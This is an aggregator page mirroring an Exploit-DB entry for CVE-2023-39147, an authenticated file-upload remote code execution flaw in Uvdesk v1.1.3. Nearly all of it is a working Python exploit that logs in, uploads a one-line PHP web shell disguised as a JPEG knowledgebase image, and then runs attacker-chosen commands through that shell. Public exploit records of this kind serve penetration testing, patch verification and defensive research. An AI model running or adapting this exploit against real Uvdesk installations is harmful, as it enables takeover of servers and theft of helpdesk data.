7
[webapps] Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated...
source link: https://www.exploit-db.com/exploits/51639
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 28/07/2023
# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security
# Vendor Homepage: https://www.uvdesk.com
# Software Link: https://github.com/uvdesk/community-skeleton
# Version: 1.1.3
# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"
# CVE : CVE-2023-39147
# Tested on: Ubuntu 20.04.6
import requests
import argparse
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
my_args = parser.parse_args()
return my_args
def main():
args = get_args()
base_url = args.url
command = args.command
uploaded_file = "shell.php"
url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command
# Edit your credentials here
login_data = {
"_username": "[email protected]",
"_password": "passwd",
"_remember_me": "off"
}
files = {
"name": (None, "pwn"),
"description": (None, "xxt"),
"visibility": (None, "public"),
"solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")
}
s = requests.session()
# Login
s.post(base_url + "/en/member/login", data=login_data)
# Upload
upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)
# Execute command
cmd = s.get(url_cmd)
print(cmd.text)
if __name__ == "__main__":
main()
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK